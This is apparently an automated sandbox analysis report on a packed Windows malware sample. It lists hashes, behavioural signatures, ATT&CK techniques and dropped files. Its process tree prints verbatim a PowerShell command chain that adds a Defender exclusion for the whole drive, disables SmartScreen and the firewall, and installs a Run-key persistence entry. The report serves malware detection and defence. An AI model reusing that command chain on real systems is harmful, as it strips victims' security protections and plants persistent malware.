Analysis

  • max time kernel
    300s
  • max time network
    178s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • resource tags

    arch:x64arch:x86image:win10-20220414-enlocale:en-usos:windows10-1703-x64system
  • submitted
    11-08-2022 22:15

General

  • Target

    8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

  • Size

    3.8MB

  • MD5

    debb7adbe78865c8950deb98364378f6

  • SHA1

    f705f91f018d64d135193115044f8e838c34f869

  • SHA256

    8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154

  • SHA512

    719427e6b19f63f9d1175c7a3765cc4c9aa61af041f2f4699b2498ec6fb540928a903bf2f6c1dd88fa3ad420e5823d52212c3d5374d15a4dea4f04dbb34bdfde

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 52 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
    "C:\Users\Admin\AppData\Local\Temp\8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Drops startup file
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      2⤵
      • Modifies security service
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4592
      • C:\ProgramData\UpSys.exe
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:976
        • C:\ProgramData\UpSys.exe
          "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5096
          • C:\ProgramData\UpSys.exe
            "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
            5⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:3556
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              6⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4672
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:2436

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Modify Existing Service

2
T1031

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

2
T1112

Virtualization/Sandbox Evasion

1
T1497

Discovery

Query Registry

2
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\MicrosoftNetwork\System.exe
    Filesize

    3.8MB

    MD5

    debb7adbe78865c8950deb98364378f6

    SHA1

    f705f91f018d64d135193115044f8e838c34f869

    SHA256

    8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154

    SHA512

    719427e6b19f63f9d1175c7a3765cc4c9aa61af041f2f4699b2498ec6fb540928a903bf2f6c1dd88fa3ad420e5823d52212c3d5374d15a4dea4f04dbb34bdfde

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • memory/976-157-0x0000000000000000-mapping.dmp
  • memory/2436-163-0x0000000000000000-mapping.dmp
  • memory/2552-119-0x00007FFCCF0C0000-0x00007FFCCF29B000-memory.dmp
    Filesize

    1.9MB

  • memory/2552-120-0x00007FF7A9790000-0x00007FF7AA102000-memory.dmp
    Filesize

    9.4MB

  • memory/2552-229-0x00007FFCCF0C0000-0x00007FFCCF29B000-memory.dmp
    Filesize

    1.9MB

  • memory/2552-118-0x00007FF7A9790000-0x00007FF7AA102000-memory.dmp
    Filesize

    9.4MB

  • memory/2552-228-0x00007FF7A9790000-0x00007FF7AA102000-memory.dmp
    Filesize

    9.4MB

  • memory/4592-126-0x0000016CFB150000-0x0000016CFB172000-memory.dmp
    Filesize

    136KB

  • memory/4592-129-0x0000016CFB6D0000-0x0000016CFB746000-memory.dmp
    Filesize

    472KB

  • memory/4592-121-0x0000000000000000-mapping.dmp
  • memory/4672-166-0x0000000000000000-mapping.dmp
  • memory/4672-211-0x00000221F18F0000-0x00000221F192C000-memory.dmp
    Filesize

    240KB